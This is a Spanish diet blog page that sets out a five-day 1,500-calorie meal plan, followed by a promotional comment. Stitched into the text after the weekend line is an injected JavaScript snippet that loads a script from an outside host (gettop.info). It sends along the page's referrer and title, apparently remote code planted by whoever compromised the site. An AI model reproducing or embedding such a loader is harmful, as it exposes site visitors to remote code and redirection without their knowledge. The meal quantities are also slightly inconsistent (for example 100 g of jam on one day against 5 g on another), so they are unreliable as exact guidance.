Salud y belleza » Dieta

La dieta de las 1500 calorías

1 Comentario

Mil quinientas. Está considerado que ese es el número de calorías ideal para las personas que hacen ejercicio pero de forma relativamente leve.

Así, con esa cifra, se consigue compensar el trabajo físico restringido por medio de una alimentación sacrificada (en parte).

Dieta de las 1500 calorías.

Día primero

De mañana: taza de leche sola con café o té, sin azúcar; una rebanada de pan tostado; cinco gramos de mermelada; ciento cincuenta gramos de fruta fresca.

De tarde: doscientos gramos de judías blancas o doscientos de lentejas guisadas, ciento cincuenta  gramos de ternera a la parrilla con ensalada, una rebanada de pan, y ciento cincuenta gramos de fruta fresca.

De noche: doscientos gramos de sopa de fideos, tortilla francesa de dos huevos, cien gramos de lenguado a la parrilla, una rebanada de pan, cien gramos de fruta fresca.

Día segundo

De mañana: taza de leche sola con café o té, sin azúcar; una rebanada de pan tostado, cien gramos de mermelada, cien gramos de fruta fresca.

De tarde: doscientos gramos de melón con jamón serrano; ensalada de espárragos, tomate, cebolla y escarola; un filete de vaca al ajillo; una rebanada de pan; yogurt sin azúcar.

De noche: un huevo pasado por agua, cien gramos de judías verdes con tomate, ciento cincuenta de merluza rebozada, cien gramos de queso fresco; una rebanada de pan.

Día tercero

De mañana: taza de leche sola con café o té, sin azúcar; una rebanada de pan tostado con mermelada, cien gramos de fruta fresca.

De tarde: cien gramos de calamares en su tinta o cien de besugo al horno; ensalada de lechuga, tomate, pepino, cebolla; cien gramos de pollo asado, una rebanada de pan, doscientos gramos de fruta fresca.

De noche: cien gramos de caldo de carne, ciento cincuenta de panaché de verduras, una rebanada de pan y una fruta a elección.

Día cuarto

De mañana: una taza de leche sola con café o té, sin azúcar; una rebanada de pan tostado
con mermelada, una fruta a elección.

De tarde: doscientos gramos de espárragos de lata, con salsa vinagreta, doscientos de paella de carne, cincuenta gramos de queso fresca, una fruta a elección.

De noche: cien gramos de sopa de pasta clarita, tortilla de dos huevos con champiñones, ciento cincuenta gramos de merluza rebozada, una fruta a elección.

Día quinto

De mañana: taza de leche sola con café o té, sin azúcar, una rebanada de pan tostado
con mermelada, una fruta fresca.

De tarde: ciento cincuenta gramos de macarrones con tomate, cien gramos de ensalada de lechuga, tomate, cebolla, pepinillos, espárragos; ciento cincuenta de bacalao cocido con patatas y una fruta a elección.

De noche: doscientos gramos de coliflor cocida, cien gramos de salchichas, pimientos asados, una rebanada de pan y arroz con leche.

Fines de semana: libre, con responsabilidad.document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Miestilonatural.com said:

    EL AGUA…

    Para más información sobre estilo de vida, deporte y alimentación pongase en miestilonatural.com…

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.